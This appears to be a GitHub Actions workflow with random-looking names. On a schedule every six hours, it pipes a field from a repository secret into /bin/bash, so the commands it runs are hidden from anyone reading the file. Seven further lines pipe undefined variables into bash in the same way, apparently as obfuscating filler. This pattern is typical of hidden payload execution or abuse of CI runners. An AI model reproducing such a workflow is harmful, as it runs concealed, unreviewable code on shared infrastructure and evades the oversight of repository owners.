name: yuantanzhanxian

on:
  workflow_dispatch:
  schedule:
    - cron: '56 5/6 * * *'

jobs:  # 2684
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yuantanzhanxian
        env:
          fxr4: ${{ secrets.fxr4 }}
        run: |
          echo $fxr4 | jq -r .cg07 | /bin/bash
          echo $xuy35182 | jq -r .ejxs4 | /bin/bash
          echo $znng814 | jq -r .ohblq63 | /bin/bash
          echo $p86 | jq -r .mp1 | /bin/bash
          echo $oarf94205 | jq -r .yrjrx311 | /bin/bash
          echo $x2 | jq -r .s45 | /bin/bash
          echo $m61 | jq -r .opbbw899 | /bin/bash
          echo $f9 | jq -r .wlpj6 | /bin/bash

